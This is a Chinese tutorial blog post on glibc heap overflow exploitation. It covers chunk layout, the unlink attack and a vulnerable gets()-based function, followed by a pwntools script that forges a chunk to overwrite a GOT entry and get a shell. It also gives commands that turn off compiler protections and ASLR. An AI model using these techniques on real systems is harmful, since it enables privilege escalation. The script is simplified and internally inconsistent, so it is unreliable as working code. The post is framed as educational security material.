堆溢出漏洞利用:从零到Root的通俗指南

最新推荐文章于 2025-10-04 09:39:32 发布
原创 最新推荐文章于 2025-10-04 09:39:32 发布 · 940 阅读 · 17 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#python #c语言 #汇编 #windows #linux #网络安全 #系统安全

PWN !堆溢出漏洞:堆内存管理机制,堆溢出如何被利用?

本文章仅提供学习,切勿将其用于不法手段!

前言:为什么要了解堆溢出?

想象一下你家的邮箱系统。每个邮箱有固定大小,邮递员按照邮箱编号投递信件。堆内存就像这样一个邮箱系统,而堆溢出就像是有人故意往你的邮箱里塞超大的包裹,导致包裹内容"溢出"到邻居的邮箱里——这样就能偷偷修改邻居的信件内容了。

第一部分:堆内存管理机制浅析

1.1 什么是堆内存?

堆是程序运行时动态分配的内存区域,与栈的最大区别是:

  • ​:自动管理,后进先出,分配速度快但大小固定
  • ​:手动管理(需要malloc/free),灵活但容易产生碎片

1.2 glibc的堆管理机制(ptmalloc2)

现代Linux系统使用ptmalloc2管理堆内存,其核心思想是:

// 简单的堆块结构(简化版)
struct chunk {
    size_t prev_size;  // 前一个块的大小
    size_t size;       // 当前块的大小+标志位
    // 实际数据区域在这里
};

关键概念:

  • bins​:管理空闲块的不同"仓库"(小型、大型、巨型)
  • arena​:每个线程有自己的分配区,避免锁竞争
  • unlink操作​:从空闲链表中移除块时的操作

第二部分:堆溢出利用原理

2.1 基本溢出场景

假设有以下漏洞代码:

void vulnerable_function() {
    char *buffer1 = malloc(16);  // 分配16字节
    char *buffer2 = malloc(16);  // 另一个16字节块
    
    gets(buffer1);  // 危险函数!没有长度检查
    
    free(buffer2);
    free(buffer1);
}

如果向buffer1输入超过16字节的数据,就会覆盖buffer2的元数据。

2.2 关键利用技术:unlink攻击

当free()操作发生时,glibc会执行unlink操作:

// unlink宏的简化版本
#define unlink(P, BK, FD) {            \
    FD = P->fd;                        \
    BK = P->bk;                        \
    FD->bk = BK;                       \
    BK->fd = FD;                       \
}

如果我们可以伪造 chunk->fd 和 chunk->bk,就能实现任意地址写入​!

2.3 现代系统的挑战与绕过

现代Linux系统有诸多保护机制:

  • ASLR​:地址空间布局随机化
  • NX​:数据区域不可执行
  • Stack Canaries​:栈保护金丝雀
  • RELRO​:重定位只读

但聪明的黑客找到了绕过方法...

第三部分:实战堆溢出利用

3.1 环境准备

首先关闭部分保护(实际渗透中需要绕过而非关闭):

# 编译 vulnerable_program.c
gcc -o vuln -fno-stack-protector -z execstack -no-pie vulnerable_program.c

# 禁用ASLR(仅用于测试)
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

3.2 信息收集阶段

#!/usr/bin/env python3
from pwn import *

context(arch='i386', os='linux')

# 启动程序
p = process('./vuln')

# 泄漏libc地址
def leak_libc():
    # 精心构造的payload使程序泄漏libc地址
    payload = b'A'*24 + p32(0x0804a000)  # 覆盖到GOT表
    p.sendline(payload)
    leak = p.recv(4)
    return u32(leak)

3.3 精心构造利用链

# 计算关键偏移量
libc_base = leak_libc() - 0x5f0b0
system_addr = libc_base + 0x3ada0
bin_sh_addr = libc_base + 0x15ba0b

# 构造伪造的堆块结构
fake_chunk = p32(0xdeadbeef)        # prev_size
fake_chunk += p32(0x21)             # size + flags
fake_chunk += p32(0x0804a028 - 12)  # fd -> GOT条目-12
fake_chunk += p32(system_addr)       # bk -> system函数地址
fake_chunk += b'/bin/sh\0'          # 参数

# 覆盖元数据并触发unlink
payload = b'A'*16 + fake_chunk
p.sendline(payload)

3.4 获取Root权限

# 触发漏洞
p.sendline('id')  # 测试命令执行
print(p.recvline())

# 获取交互式shell
p.interactive()

第四部分:现代利用技术演进

4.1 面对完整保护的现实挑战

实际渗透中,你需要面对完整的安全措施:

# 现实中的绕过技术示例
def bypass_aslr():
    # 使用堆喷射或部分覆盖来绕过ASLR
    # 或者利用信息泄漏漏洞
    pass

def bypass_dep():
    # 使用ROP(Return-Oriented Programming)
    # 或者修改GOT/PLT条目
    pass

4.2 高级利用技术

  1. House of Spirit​:伪造空闲块
  2. House of Force​:溢出覆盖top chunk
  3. Fastbin Attack​:利用快速箱机制
  4. Tcache Poisoning​:针对glibc 2.26+的新机制

第五部分:防御视角与深度思考

5.1 为什么堆溢出仍然危险?

  1. 复杂性​:堆管理机制复杂,难以完全审计
  2. 灵活性​:动态特性使得静态分析困难
  3. 进化性​:新的利用技术不断出现

5.2 防御建议

// 安全编程实践
// 避免使用危险函数
// gets(buffer);  // 错误示范
fgets(buffer, sizeof(buffer), stdin);  // 正确做法

// 使用现代内存安全语言
// Rust, Go等语言内置内存安全特性

5.3 伦理思考

  • 渗透测试必须获得明确授权
  • 漏洞研究是为了提高安全性
  • 技术能力伴随道德责任

结语:技术之路

堆溢出利用是一门需要深厚技术功底的艺术。理解内存管理机制不仅有助于漏洞利用,更能帮助我们构建更安全的系统。记住:真正的黑客精神不是破坏,而是理解、创造和改进。

思考题​:如果让你设计一个全新的内存管理系统,你会如何平衡性能与安全性?

注:本文仅用于教育目的,实际渗透测试必须获得合法授权。未经授权的黑客行为是违法的。

一文就够-InfiniBand 技术全面解析:从原理到实践的通俗易懂指南
jundao1997的专栏
07-07 1083
想象一下,在一个超级数据中心里,成千上万台服务器需要像蜜蜂群体一样高效协作。如果用传统的网络连接,就像让每只蜜蜂都排着队传递消息,效率极低。InfiniBand(简称 IB)就是为了解决这种 "通信拥堵" 而生的高速网络技术,它专门为高性能计算(HPC)、数据中心和云计算环境设计,就像给服务器之间搭建了多条高速公路,让数据可以飞驰而过。
【信息收集】——3、信息收集指南
热门推荐
Fly_鹏程万里
02-26 4万+
无意中发现了一个巨牛巨牛的人工智能教程,忍不住分享一下给大家。教程不仅是基础,通俗易懂,小白也能学,而且非常风趣幽默,还时不时有内涵段子,像看小说一样,哈哈~我正在学习中,觉得太牛了,所以分享给大家。点这里可以跳转到教程! 前言 本系列文章只做技术研究与分享,如有恶意利用文章中提及的技术做网络攻击,造成的法律责任,作者概不负责! 安全问题的本质 安全问题的本质是“信...
堆溢出个人学习总结
snowleopard_bin的博客
08-01 5362
Unlink ctf wiki中有个地方困扰了我很久: // fd bk if (__builtin_expect (FD->bk != P || BK->fd != P, 0)) \ malloc_printerr (check_action, "corrupted double-linked list", P, AV); ...
堆溢出漏洞简介
这里没人
05-14 8787
简介 这次来介绍一下堆溢出漏洞。不过这次的堆溢出漏洞比较复杂,不像栈溢出一样容易理解。所以这一次的内容会比较多。我尽量详细的介绍堆溢出漏洞,以及相关的知识。 首先,关于神马是堆溢出。简而言之就是在堆上产生的溢出。一般我们使用malloc等函数申请的内存都会储存在堆段上。并且由操作系统来管理已经使用和剩余内存,完成内存分配以及回收等等的操作。而堆溢出便是因为程序员的粗心大意,造成了读入的数据超过...
Windows堆溢出三种利用方式深度解析与实战
最新发布
weixin_29009401的博客
10-04 1018
Start[开始运行程序] --> Alloc[堆上分配TestClass对象]Alloc --> Read[读取payload.bin]Read --> Copy[strcpy触发溢出]Copy --> Overwrite[覆盖vptr为0x00405000]Overwrite --> Call[t->trigger()调用]Call --> Jump[CPU跳转至0x00405000]Jump --> Exec[执行shellcode]
堆栈溢出漏洞:原理、利用与防范
weixin_42130310的博客
08-18 3865
堆栈溢出漏洞是一种常见的安全漏洞,通常发生在程序使用不安全的字符串处理函数时。当程序尝试将超过预定大小的数据写入栈上分配的内存区域时,就会导致堆栈溢出。这种漏洞可能被攻击者利用,以覆盖返回地址或其他重要数据,从而控制程序的执行流。堆栈溢出漏洞是一种严重的安全风险,攻击者可以利用它来控制程序的执行流。通过使用安全的字符串处理函数和启用多种安全机制,可以有效地防止此类漏洞的发生。定期使用工具如checksec来检查程序的安全特性,将有助于提高系统的整体安全。
libc2.26以下的单一堆溢出漏洞利用——0ctf_2017_babyheap
PLpa的博客
08-03 684
前言: 此题为libc2.26以下的libc环境,在libc2.27及以上不一定行得通。 解题思路: 查看保护: 保护全开的64位程序。 观察IDA伪代码: 我们进入IDA看看程序(在此之前建议先运行一遍程序,看看程序的逻辑)。 标准的菜单题,题目先申请了一块堆结构来保存接下来我们要申请的堆地址,在开了保护的情况下,我们并不能很容易的找到这块堆地址在哪,这样我们就很难把堆块劫持到这个上面。 我们看看各个功能: 增 本题采用了calloc来申请堆块,这样对于申请的堆块来说,原有的数据就会被清除掉,这样我
初级堆溢出-unlink漏洞
weixin_34395205的博客
09-30 350
Linux下堆的unlink漏洞 参考文章:https://blog.youkuaiyun.com/qq_25201379/article/details/81545128 首先介绍一下Linux的堆块结构: struct malloc_chunk { INTERNAL_SIZE_T prev_size; INTERNAL_SIZE_T size; struct malloc_chunk *f...
PWN简单利用堆栈溢出漏洞
weixin_43891422的博客
07-16 2038
PWN简单利用堆栈溢出漏洞PWN简单利用堆栈溢出漏洞0x01 栈的介绍栈是什么栈的特点栈中如何存储数据0x02 函数调用栈寄存器分配0x03 栈帧结构例题:堆栈溢出漏洞利用0x01.运行程序、查看文件类型 和 保护措施0x02.反汇编分析0x03.调试分析payload0x04.payload生成脚本0x05.总结 PWN简单利用堆栈溢出漏洞 0x01 栈的介绍 栈是什么 栈都是一种数据项按序排列的数据结构。 栈的特点 先入先出,先后放入栈中的数据要先取出来。 栈的地址从高处向低处增长,且栈是一块连续区
59、网络安全漏洞评估与报告撰写指南
food6的博客
09-11 43
本博客全面介绍了网络安全漏洞评估与报告撰写的相关知识。内容涵盖使用CVSS评分系统评估漏洞风险、报告撰写的重要性和结构、不同类型漏洞的评分示例,以及如何根据客户需求调整报告策略。同时,还介绍了实用工具如Dradis CE的安装、使用与报告优化建议,帮助渗透测试人员提高工作效率和报告质量。
59、网络安全报告撰写与漏洞评估指南
xxx12的博客
08-01 63
本博客详细介绍了网络安全报告撰写与漏洞评估的核心方法和工具。内容涵盖通用漏洞评分系统(CVSS)的使用,如何计算漏洞风险评分,报告撰写的关键部分与技巧,以及利用Dradis CE进行项目管理和报告生成的具体步骤。通过学习这些知识,网络安全专业人员可以提高评估漏洞风险和撰写高质量报告的能力,为客户提供更有效的安全解决方案。
堆溢出和堆利用
07-16
这是一本讲述堆溢出利用方法的书,第一部分讲基本原理,第二部分讲方法,第三部分讲战略
TryHackMe | Blue Writeup (超干货详细msf渗透使用指南
qq_25755011的博客
02-04 7440
因为给师弟师妹布置了这个任务作为假期渗透作业,是个对ms17_010漏洞利用的学习,而且网上中文的writeup很少(好像直接没有),所以写一篇Writeup记录一下。刚好也是一个相对完整的msf使用介绍,如有错误的地方欢迎各位师傅讨论指出 tryhackme是个很好的外网网络攻防学习平台,不用VPN也可以正常使用只是稍微有点卡,各位师傅有兴趣也可以去玩一玩。这里把这题的题目链接放给大家 TryHackMe | Blue 前期准备 kali Linux (仅用到msf框架与nmap) openvpn与.
堆溢出漏洞
温和的跳跃
02-08 531
…………
glibc下各种堆溢出漏洞利用条件和方法总结
axiejundong的博客
12-30 3057
各种堆溢出漏洞总结溢出多个字节的情况一、利用条件一个chunk可以溢出,并且可以覆盖到下一个 chunk 的 size 位、fd、bk二、利用关键把 second chunk 的 size 覆盖为0,fd 改成 free@got-12, bk=shellcode 的地址(unlink 宏里面没有 check 可以这样做),然后 free first chunk。first chunk 会查找前后有没
堆溢出利用
4ct10n
05-02 6572
堆的工作原理与利用
Linux内核之堆溢出利用
蚁景网安学院
09-13 636
用户进程会通过malloc等函数进行动态内存分配相应的内核也有一套动态的内存分配机制。该项目在执行read模块时会从内核堆地址中拷贝信息到用户空间中去,但是这里的拷贝没有对长度做限制,因此存在着越界读的漏洞
Linux sudo堆溢出漏洞(CVE-2021-3156)
01-28 1258
漏洞描述: 2021年01月27日,RedHat官方发布了sudo 缓冲区/栈溢出漏洞的风险通告,普通用户可以通过利用漏洞,而无需进行身份验证,成功获取root权限。漏洞POC已在互联网上公开,提醒Linux系统管理员尽快修复。 漏洞级别:高危 受影响的版本: sudo: 1.8.2 - 1.8.31p2 sudo: 1.9.0 - 1.9.5p1 修复版本: 1/CentOS修复方式...
【pwn学习】堆溢出(四)- off-by-one 漏洞
Morphy_Amo的博客
02-16 1332
off-by-one 漏洞 前置学习 【pwn学习】堆溢出(一) 【pwn学习】堆溢出(二)- First Fit 【pwn学习】堆溢出(三)- Unlink和UAF off-by-one是一种特殊的溢出漏洞,指只溢出一个字节的情况。 造成原因 造成off-by-one的原因常常是因为边界验证不充分。 循环写入时,循环次数设置错误导致多写入了一个字节; 字符串操作有误; strlen 是我们很熟悉的计算 ascii 字符串长度的函数,这个函数在计算字符串长度时是不把结束符 '\x00' 计算
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值